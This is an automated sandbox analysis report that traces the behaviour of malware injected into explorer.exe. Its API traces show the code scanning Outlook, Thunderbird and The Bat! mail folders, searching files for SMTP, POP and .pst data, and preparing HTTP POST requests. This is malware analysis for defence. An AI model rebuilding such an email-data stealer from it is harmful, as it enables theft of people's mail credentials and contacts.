                                                        • FindNextFileW.KERNELBASE(00000000,?,?,000818F4), ref: 00082644
                                                        • FindClose.KERNEL32(00000000,?,000818F4), ref: 00082653
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.510177212.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: AppendFindPathlstrcat$FileHeap$AllocateCloseFirstMemoryNextProcessZero
                                                        • String ID: *.*
                                                        • API String ID: 1648349226-438819550
                                                        • Opcode ID: f244eec9a02c202261c54c00ec9b413ed975cdb29ccbfba86f23e8cd56307f5a
                                                        • Instruction ID: 9ab04f0758e8323f23007aef3f0b497425df495bdb796eec7b4485748527ddf8
                                                        • Opcode Fuzzy Hash: f244eec9a02c202261c54c00ec9b413ed975cdb29ccbfba86f23e8cd56307f5a
                                                        • Instruction Fuzzy Hash: C9217171204315AFE710BF209D589AFBBECFFC5B05F04051DFAD1A2251EB389A168B66

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 267 81016-81020 call 827e2 270 81022-81023 267->270 271 81024-81049 call 829b7 RtlMoveMemory NtUnmapViewOfSection call 8104f 267->271 275 8104e 271->275
                                                        APIs
                                                          • Part of subcall function 000827E2: VirtualQuery.KERNEL32(00000000,00000209,0000001C,00000209,00082664,?,000818F4), ref: 000827EF
                                                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 0008103A
                                                        • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00081043
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.510177212.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                                        • String ID:
                                                        • API String ID: 1675517319-0
                                                        • Opcode ID: baec96bfdead2c76f9d40b549b314d090c8656c966da0cfbe969c1d0fccf5cf0
                                                        • Instruction ID: 55d5dd33b2f901c1089b15beaab3eab97d09ece425fd31eaa01e34cb85dd0178
                                                        • Opcode Fuzzy Hash: baec96bfdead2c76f9d40b549b314d090c8656c966da0cfbe969c1d0fccf5cf0
                                                        • Instruction Fuzzy Hash: 23D05E31800260B7EA657774BC1E9CA2A8CBF45730B254251B6E5961D3C9794A818B71

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                          • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                        • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 0008107F
                                                        • ExpandEnvironmentStringsW.KERNEL32(%LOCALAPPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 00081093
                                                        • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\Microsoft\Outlook,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 000810A7
                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000005,00000000), ref: 000810BB
                                                        • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Thunderbird,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 000810D3
                                                        • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\The Bat!,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 000810E7
                                                        • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\The Bat!,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 000810FB
                                                        • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\BatMail,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 0008110F
                                                        • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\BatMail,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 00081123
                                                        • wsprintfA.USER32 ref: 0008116B
                                                        • ExitProcess.KERNEL32 ref: 00081189
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.510177212.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: EnvironmentExpandStrings$HeapProcess$AllocateExitFolderPathSpecialwsprintf
                                                        • String ID: %ALLUSERSPROFILE%\BatMail$%ALLUSERSPROFILE%\Microsoft\Outlook$%ALLUSERSPROFILE%\The Bat!$%APPDATA%\BatMail$%APPDATA%\Microsoft\Outlook$%APPDATA%\The Bat!$%APPDATA%\Thunderbird$%LOCALAPPDATA%\Microsoft\Outlook$%s,
                                                        • API String ID: 1709485025-1688604020
                                                        • Opcode ID: 72968f9d89e6bc32a17a9400d13fd263b6a4988c16ccb6dcd1446170f9e16262
                                                        • Instruction ID: 4a2ba61a2a61d2de802517fd4c21c0c34be2e32a5e302aa0719222a3359143be
                                                        • Opcode Fuzzy Hash: 72968f9d89e6bc32a17a9400d13fd263b6a4988c16ccb6dcd1446170f9e16262
                                                        • Instruction Fuzzy Hash: 7331937174022566EA5133654C1AFFF198DBF81FD4B050124F6C9DA2C3DE598E0387B6

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 65 8126e-81298 CreateFileW 66 816fb-81708 Sleep 65->66 67 8129e-812b0 GetFileSize 65->67 68 816f3-816fa CloseHandle 67->68 69 812b6-812bc 67->69 68->66 69->68 70 812c2-812d5 call 829b7 69->70 73 812db-812fc ReadFile 70->73 74 816f2 70->74 75 812fe-81301 73->75 76 8130f 73->76 74->68 77 816eb-816ed call 82999 75->77 78 81307-8130d 75->78 79 81315-8131b 76->79 77->74 78->79 80 81329-8134b SetFilePointer 79->80 81 8131d-8131f 79->81 80->77 84 81351-8135d 80->84 81->80 83 81321-81323 81->83 83->77 83->80 85 8136b-81372 84->85 86 8135f-81369 84->86 87 81374-8137f RtlMoveMemory 85->87 88 81381 85->88 86->87 89 81383-81394 87->89 88->89 90 8139d-813a1 89->90 91 81396-8139b 89->91 92 813a3-813db ReadFile 90->92 91->92 93 816db-816e5 92->93 94 813e1-813e9 92->94 93->77 93->84 95 813ef-813f7 94->95 96 81561-81569 94->96 97 816bc-816c9 95->97 98 813fd-81405 95->98 96->97 99 8156f-81577 96->99 97->94 101 816cf-816d7 97->101 98->97 100 8140b-81417 98->100 99->97 102 8157d-81589 99->102 103 81419-8141e 100->103 104 81420-81422 100->104 101->93 105 8158b-81590 102->105 106 81592-81594 102->106 103->104 104->97 107 81428-81441 call 818ea 104->107 105->106 106->97 108 8159a-815b3 call 818ea 106->108 113 816b8 107->113 115 81447-81458 call 8170b 107->115 108->113 114 815b9-815ca call 8170b 108->114 113->97 114->113 120 815d0-815d5 114->120 115->113 121 8145e-81468 115->121 120->113 122 815db-815ed 120->122 121->113 123 8146e-81480 121->123 124 815ff-81601 122->124 125 815ef-815fb call 8185c 122->125 126 81492-81494 123->126 127 81482-8148e call 8185c 123->127 131 81613-81619 124->131 132 81603-8160e call 81810 124->132 125->124 128 814a6-814ac 126->128 129 81496-814a1 call 81810 126->129 127->126 136 8154b-8155c call 81c39 128->136 137 814b2-814b9 128->137 129->128 140 8161f-81626 131->140 141 816a0-816ac call 81c39 131->141 132->131 155 816b1-816b3 call 81972 136->155 143 814bf-814c4 137->143 144 81542-81545 137->144 145 81628-8162d 140->145 146 8169b-8169e 140->146 141->155 149 814ca-814d3 143->149 150 814c6-814c8 143->150 144->113 144->136 151 8162f-81631 145->151 152 81633-8163c 145->152 146->113 146->141 149->113 156 814d9-814de 149->156 150->144 150->149 151->146 151->152 152->113 154 8163e-81643 152->154 154->113 157 81645-81652 154->157 155->113 156->113 159 814e4-814f1 156->159 160 81653-8166c 157->160 161 814f2-8150b 159->161 162 8166e-81671 160->162 163 8168f-81694 160->163 164 8150d-81510 161->164 165 8152e-81533 161->165 162->163 167 81673-8168b call 81c39 call 81972 162->167 163->160 168 81696 163->168 164->165 169 81512-8152a call 81c39 call 81972 164->169 165->161 166 81535-8153d 165->166 166->113 167->163 168->146 169->165
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00081289
                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 000812A1
                                                        • CloseHandle.KERNELBASE(00000000), ref: 000816F4
                                                          • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                          • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                        • ReadFile.KERNELBASE(00000000,00000000,00000400,?,00000000), ref: 000812E8
                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0008132D
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 00081379
                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 000813B6
                                                          • Part of subcall function 00081C39: RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081C55
                                                          • Part of subcall function 00081972: RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081994
                                                        • Sleep.KERNELBASE(00000064), ref: 000816FD
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.510177212.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: File$MemoryMove$HeapRead$AllocateCloseCreateHandlePointerProcessSizeSleep
                                                        • String ID:
                                                        • API String ID: 1032042679-0
                                                        • Opcode ID: 61bc2f22d2100cfa5cada242e575fdd2c09bc464b337c3e81574e5df978ef6ef
                                                        • Instruction ID: 75e5417636b9bb59cc4e60b4fe32e97da451ac298a5a535e8d66e3deab824b36
                                                        • Opcode Fuzzy Hash: 61bc2f22d2100cfa5cada242e575fdd2c09bc464b337c3e81574e5df978ef6ef
                                                        • Instruction Fuzzy Hash: 9DD1D2746082119BC764BF2888406FABBEABFC8760F48462DF8D597295E7308D53CB95

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 178 8274a-82763 CreateToolhelp32Snapshot 179 827b9-827bd 178->179 180 82765-8277d Process32First 178->180 181 827ae-827b0 180->181 182 8277f-82793 lstrcmpi 181->182 183 827b2-827b3 CloseHandle 181->183 184 827a0-827a8 Process32Next 182->184 185 82795-8279b call 827be 182->185 183->179 184->181 185->184
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00082758
                                                        • Process32First.KERNEL32(00000000,?), ref: 00082777
                                                        • lstrcmpi.KERNEL32(?,outlook.exe), ref: 0008278B
                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 000827A8
                                                        • CloseHandle.KERNELBASE(00000000), ref: 000827B3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.510177212.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
                                                        • String ID: outlook.exe
                                                        • API String ID: 868014591-749849299
                                                        • Opcode ID: 5a2c25bce87a4886a15f15d2e2ef7a80a439fc0a196e4a8c78eb7e8f423e4933
                                                        • Instruction ID: 343884579346d2584715dea729d65f949d7c5dc94cdf17a98ebe8d79567dd670
                                                        • Opcode Fuzzy Hash: 5a2c25bce87a4886a15f15d2e2ef7a80a439fc0a196e4a8c78eb7e8f423e4933
                                                        • Instruction Fuzzy Hash: 23F06230505128ABE720BB65DC49BEE77BCBB48B25F400190E9C9A2191EB388B544F95

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 195 89cf6-89d10 196 89d15 195->196 197 89d16-89d28 196->197 199 89d2a 197->199 200 89d8e-89d8f 197->200 202 89d2c-89d36 199->202 203 89caf-89cbd 199->203 201 89d90-89d95 200->201 204 89d96-89d98 201->204 202->196 207 89d38-89d43 202->207 205 89cbf-89cce 203->205 206 89cd1-89cf4 203->206 208 89d9a-89d9f 204->208 209 89da1 204->209 205->206 206->195 210 89d44-89d4c 207->210 208->209 209->201 211 89da3 209->211 210->210 212 89d4e-89d50 210->212 213 89da8-89daa 211->213 214 89d79-89d88 212->214 215 89d52-89d55 212->215 216 89dac-89db1 213->216 217 89db3-89db7 213->217 214->200 214->208 215->197 218 89d57-89d75 215->218 216->217 217->213 221 89db9 217->221 219 89d7b-89d88 218->219 220 89f3d 218->220 219->208 220->220 222 89dbb-89dc2 221->222 223 89dc4-89dc9 221->223 222->213 222->223 224 89dd8-89dda 223->224 225 89dcb-89dd4 223->225 226 89ddc-89de1 224->226 227 89de3-89de7 224->227 228 89e4a-89e4d 225->228 229 89dd6 225->229 226->227 230 89de9-89dee 227->230 231 89df0-89df2 227->231 232 89e52-89e55 228->232 229->224 230->231 234 89e14-89e23 231->234 235 89df4 231->235 233 89e57-89e59 232->233 233->232 236 89e5b-89e5e 233->236 238 89e34-89e41 234->238 239 89e25-89e2c 234->239 237 89df5-89df7 235->237 236->232 240 89e60-89e7c 236->240 241 89df9-89dfe 237->241 242 89e00-89e04 237->242 238->238 243 89e43-89e45 238->243 239->239 244 89e2e 239->244 240->233 245 89e7e 240->245 241->242 242->237 246 89e06 242->246 243->204 244->204 247 89e84-89e88 245->247 248 89e08-89e0f 246->248 249 89e11 246->249 250 89e8a-89ea0 247->250 251 89ecf-89ed2 247->251 248->237 248->249 249->234 259 89ea1-89ea6 250->259 252 89ed5-89edc 251->252 253 89ede-89ee0 252->253 254 89f00-89f30 VirtualProtect * 2 252->254 256 89ee2-89ef1 253->256 257 89ef3-89efe 253->257 258 89f34-89f38 254->258 256->252 257->256 258->258 260 89f3a 258->260 259->247 261 89ea8-89eaa 259->261 260->220 262 89eac-89eb2 261->262 263 89eb3-89ec0 261->263 262->263 265 89ec9-89ecc 263->265 266 89ec2-89ec7 263->266 266->259
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.510177212.0000000000088000.00000040.80000000.00040000.00000000.sdmp, Offset: 00088000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_88000_explorer.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0108dd120b053b6f55e8645ecb237e8214c936467551cc72fb4cdbd494caad90
                                                        • Instruction ID: a463335449e91c4295caeb03356daa0005c9d69c2ec95bec009e1af8dcd402f7
                                                        • Opcode Fuzzy Hash: 0108dd120b053b6f55e8645ecb237e8214c936467551cc72fb4cdbd494caad90
                                                        • Instruction Fuzzy Hash: 439137725193914FD726BE78CCC46B5BFE0FB52320B2C06A9D9D1CB386E7A4580AC764

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 276 829b7-829c7 GetProcessHeap RtlAllocateHeap
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.510177212.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocateProcess
                                                        • String ID:
                                                        • API String ID: 1357844191-0
                                                        • Opcode ID: b9351f4542ec540c723d8288ffa8f1c93b00f39b480ad427a02778a4ffa0a27d
                                                        • Instruction ID: 3c8c13ecdc887a9dfa87a418431857bd093085331a36a112817de6aaaa3d87e4
                                                        • Opcode Fuzzy Hash: b9351f4542ec540c723d8288ffa8f1c93b00f39b480ad427a02778a4ffa0a27d
                                                        • Instruction Fuzzy Hash: 1CA002B15503005BFD4457F5AE1EA157528B7D4B01F0045447385890549A6955148F21

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 284 82999-829a3 call 827e2 287 829b5-829b6 284->287 288 829a5-829af GetProcessHeap HeapFree 284->288 288->287
                                                        APIs
                                                          • Part of subcall function 000827E2: VirtualQuery.KERNEL32(00000000,00000209,0000001C,00000209,00082664,?,000818F4), ref: 000827EF
                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000209,00082664,?,000818F4), ref: 000829A8
                                                        • HeapFree.KERNEL32(00000000,?,000818F4), ref: 000829AF
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.510177212.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Heap$FreeProcessQueryVirtual
                                                        • String ID:
                                                        • API String ID: 2580854192-0
                                                        • Opcode ID: df64934d43702fa617687989b5c70bf43bb8b9b35f146b4e005b86ab177719a1
                                                        • Instruction ID: 09411c8b402897cefff5f73e0440f262c5ce0b05ffcf0dbc953be38e067b1978
                                                        • Opcode Fuzzy Hash: df64934d43702fa617687989b5c70bf43bb8b9b35f146b4e005b86ab177719a1
                                                        • Instruction Fuzzy Hash: ACC02B3100433053DA6037743C1DBC63B0CBF8AB21F050082F9C1970418B6A8C018BB0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 289 81c39-81c5f call 829b7 RtlMoveMemory 292 81c65-81c6d 289->292 293 81e36-81e3c 289->293 294 81e2d-81e30 292->294 295 81c73-81c75 292->295 294->292 294->293 295->294 296 81c7b-81c80 295->296 296->294 297 81c86-81c8b 296->297 297->294 298 81c91-81c96 297->298 298->294 299 81c9c-81ca0 298->299 300 81cd2-81cd4 299->300 301 81ca2-81cae call 81ffb 299->301 300->294 302 81cda-81cf0 300->302 307 81cc9-81ccc 301->307 308 81cb0-81cb3 301->308 302->294 304 81cf6-81cfa 302->304 304->294 306 81d00-81d0b 304->306 310 81d0d 306->310 311 81d45-81d47 306->311 307->301 309 81cce 307->309 312 81cba-81cbd 308->312 313 81cb5-81cb8 308->313 309->300 315 81d11-81d1d call 81ffb 310->315 311->294 314 81d4d-81d56 311->314 312->307 316 81cbf-81cc2 312->316 313->307 313->312 317 81d58-81d5e 314->317 318 81d74 314->318 326 81d38-81d3b 315->326 327 81d1f-81d22 315->327 316->307 320 81cc4-81cc7 316->320 321 81d6e-81d72 317->321 322 81d60-81d67 call 81ffb 317->322 318->294 324 81d7a-81d81 318->324 320->307 320->309 321->318 322->321 334 81d69-81d6c 322->334 324->294 328 81d87-81d8a 324->328 326->315 329 81d3d-81d41 326->329 331 81d29-81d2c 327->331 332 81d24-81d27 327->332 328->294 333 81d90-81d99 328->333 329->311 331->326 335 81d2e-81d31 331->335 332->326 332->331 336 81e29 333->336 337 81d9f-81da2 333->337 334->317 334->321 335->326 338 81d33-81d36 335->338 336->294 337->336 339 81da8-81de9 call 829b7 RtlMoveMemory RtlZeroMemory StrStrIA 337->339 338->326 338->329 342 81deb-81df5 StrStrIA 339->342 343 81e22-81e24 call 82999 339->343 342->343 344 81df7-81e01 StrStrIA 342->344 343->336 344->343 346 81e03-81e0d StrStrIA 344->346 346->343 347 81e0f-81e19 StrStrIA 346->347 347->343 348 81e1b-81e1d call 81e44 347->348 348->343
                                                        APIs
                                                          • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                          • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                        • RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081C55
                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00081DBA
                                                        • RtlZeroMemory.NTDLL(?,?), ref: 00081DD3
                                                        • StrStrIA.SHLWAPI(00000000,from), ref: 00081DE5
                                                        • StrStrIA.SHLWAPI(00000000,Blob), ref: 00081DF1
                                                        • StrStrIA.SHLWAPI(00000000,Pop), ref: 00081DFD
                                                        • StrStrIA.SHLWAPI(00000000,SMTP), ref: 00081E09
                                                        • StrStrIA.SHLWAPI(00000000,.pst), ref: 00081E15
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.510177212.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Memory$HeapMove$AllocateProcessZero
                                                        • String ID: -$-$.$.$.pst$/$/$:$:$Blob$Pop$SMTP$_$_$from
                                                        • API String ID: 1061763166-3069160855
                                                        • Opcode ID: b84919368493d7d5f368d1f8ce8e5c1d9a6d62c27fbc89321324b14f0ac629bc
                                                        • Instruction ID: 4b5aa8aed124a3871e58e12401931c93ac944f0da3ca0bc3fe3e93e69f00f3b1
                                                        • Opcode Fuzzy Hash: b84919368493d7d5f368d1f8ce8e5c1d9a6d62c27fbc89321324b14f0ac629bc
                                                        • Instruction Fuzzy Hash: BC5156B0B407165BEB64BA1888A46FE77DEBF85700F084919FDC44B283DB798C474792

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 350 81972-819a6 call 829b7 RtlMoveMemory 353 81c2c-81c31 350->353 354 819ac-819b6 350->354 355 819b7-819bb 354->355 356 819c1-819c3 355->356 357 81c17-81c25 355->357 356->357 358 819c9-819ce 356->358 357->355 359 81c2b 357->359 358->357 360 819d4-819db 358->360 359->353 360->357 361 819e1-819e4 360->361 361->357 362 819ea-819fc 361->362 363 819fe-81a05 362->363 364 81a4f-81a51 362->364 367 81a06-81a11 call 81ffb 363->367 365 81c10-81c12 364->365 366 81a57-81a68 364->366 369 81c13 365->369 366->365 368 81a6e-81a72 366->368 375 81a13-81a1e 367->375 376 81a37-81a3a 367->376 368->365 371 81a78-81a7c 368->371 369->357 373 81a7e-81a84 371->373 374 81ad1-81ad3 371->374 379 81a85-81a90 call 81ffb 373->379 374->365 378 81ad9-81adf 374->378 380 81a20-81a23 375->380 381 81a25-81a28 375->381 376->367 377 81a3c-81a4e 376->377 377->364 382 81b00-81b03 378->382 392 81abc-81abf 379->392 393 81a92-81a9d 379->393 380->376 380->381 381->376 384 81a2a-81a30 381->384 386 81ae1-81ae9 382->386 387 81b05-81b07 382->387 384->376 385 81a32-81a35 384->385 385->376 385->377 386->387 389 81aeb-81afa call 81ffb 386->389 390 81c0c 387->390 391 81b0d-81b14 387->391 389->382 389->390 390->365 391->390 396 81b1a-81b1d 391->396 392->379 394 81ac1-81acd 392->394 397 81a9f-81aa5 393->397 398 81aa7-81aad 393->398 394->374 396->390 400 81b23-81b2a 396->400 397->392 397->398 398->392 401 81aaf-81ab5 398->401 400->390 402 81b30-81b33 400->402 401->392 403 81ab7-81aba 401->403 402->390 404 81b39-81b73 call 829b7 RtlMoveMemory RtlZeroMemory 402->404 403->392 403->394 407 81b79-81b83 404->407 408 81c02-81c0a 404->408 407->408 409 81b85-81b8b 407->409 408->369 409->408 410 81b8d-81b9d StrStrIW 409->410 411 81bfb-81bfd call 82999 410->411 412 81b9f-81ba9 StrStrIW 410->412 411->408 412->411 414 81bab-81bb5 StrStrIW 412->414 414->411 415 81bb7-81bc1 StrStrIW 414->415 415->411 416 81bc3-81bcd StrStrIW 415->416 416->411 417 81bcf-81bd8 lstrlenW 416->417 417->411 418 81bda-81bf6 call 829b7 call 82917 call 81e44 call 82999 417->418 418->411
                                                        APIs
                                                          • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                          • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                        • RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081994
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000001), ref: 00081B53
                                                        • RtlZeroMemory.NTDLL(00000000,00000001), ref: 00081B61
                                                        • StrStrIW.SHLWAPI(00000000,from), ref: 00081B99
                                                        • StrStrIW.SHLWAPI(00000000,Blob), ref: 00081BA5
                                                        • StrStrIW.SHLWAPI(00000000,Pop), ref: 00081BB1
                                                        • StrStrIW.SHLWAPI(00000000,SMTP), ref: 00081BBD
                                                        • StrStrIW.SHLWAPI(00000000,.pst), ref: 00081BC9
                                                        • lstrlenW.KERNEL32(00000000), ref: 00081BD0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.510177212.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Memory$HeapMove$AllocateProcessZerolstrlen
                                                        • String ID: .pst$;$<$Blob$Pop$SMTP$from
                                                        • API String ID: 76385412-3831209991
                                                        • Opcode ID: daa115a76ccc5235f2113b9ee301909c6d2d8d6482403054c7f97d7641e7743b
                                                        • Instruction ID: 4513c980414ea6726187ff74bc215935d9f5c7d3fe74b3bdc2598ba981a98ec9
                                                        • Opcode Fuzzy Hash: daa115a76ccc5235f2113b9ee301909c6d2d8d6482403054c7f97d7641e7743b
                                                        • Instruction Fuzzy Hash: 7B71D2357443129BDB28BF18DD40AEE77E9BF88750F148829E9C19B282DB70DD878791

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 426 820a7-82102 call 82415 call 829b7 call 82938 call 824cc 435 8211d-82129 426->435 436 82104-8211b 426->436 439 8212d-8212f 435->439 436->439 440 82403-82412 call 82999 439->440 441 82135-8216c RtlZeroMemory 439->441 445 823fb-82402 441->445 446 82172-8218d 441->446 445->440 447 821bf-821d1 446->447 448 8218f-821a0 call 8243d 446->448 453 821d5-821d7 447->453 454 821a2-821b1 448->454 455 821b3 448->455 456 823e8-823ee 453->456 457 821dd-82239 call 82866 453->457 458 821b5-821bd 454->458 455->458 461 823f0-823f2 call 82999 456->461 462 823f7 456->462 466 8223f-82244 457->466 467 823e1 457->467 458->453 461->462 462->445 468 8225e-8228c call 829b7 wsprintfW 466->468 469 82246-82257 466->469 467->456 472 8228e-82290 468->472 473 822a5-822bc 468->473 469->468 474 82291-82294 472->474 479 822fb-82315 473->479 480 822be-822f4 call 829b7 wsprintfW 473->480 475 8229f-822a1 474->475 476 82296-8229b 474->476 475->473 476->474 478 8229d 476->478 478->473 484 8231b-8232e 479->484 485 823be-823d4 call 82999 479->485 480->479 484->485 488 82334-8234a call 829b7 484->488 493 823dd 485->493 494 823d6-823d8 call 82999 485->494 495 8234c-82357 488->495 493->467 494->493 497 82359-82366 call 8297c 495->497 498 8236b-82382 495->498 497->498 502 82384 498->502 503 82386-82393 498->503 502->503 503->495 504 82395-82399 503->504 505 8239b 504->505 506 823b3-823ba call 82999 504->506 508 8239b call 8296b 505->508 506->485 510 823a0-823ad RtlMoveMemory 508->510 510->506
                                                        APIs
                                                          • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                          • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                          • Part of subcall function 00082938: lstrlen.KERNEL32(0065AE26,?,00000000,00000000,000820E3,75712B62,0065AE26,00000000), ref: 00082940
                                                          • Part of subcall function 00082938: MultiByteToWideChar.KERNEL32(00000000,00000000,0065AE26,00000001,00000000,00000000), ref: 00082952
                                                          • Part of subcall function 000824CC: RtlZeroMemory.NTDLL(?,00000018), ref: 000824DE
                                                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 0008213F
                                                        • wsprintfW.USER32 ref: 00082278
                                                        • wsprintfW.USER32 ref: 000822E3
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 000823AD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.510177212.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                        • API String ID: 4204651544-1701262698
                                                        • Opcode ID: 2d0a82c8d0d7e4589e8405ce0e55f6720ae0ccaaaabdf10beb67123a4c5655e5
                                                        • Instruction ID: a01ef7159da9355fa114d69cd7f2b2a9dec58d7afaa36dde2eb3a980ae35fe43
                                                        • Opcode Fuzzy Hash: 2d0a82c8d0d7e4589e8405ce0e55f6720ae0ccaaaabdf10beb67123a4c5655e5
                                                        • Instruction Fuzzy Hash: 2DA16AB1608340AFE750EF68D894A6BBBE8FF88750F10092DF9C5D7252DA34DE058B52

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
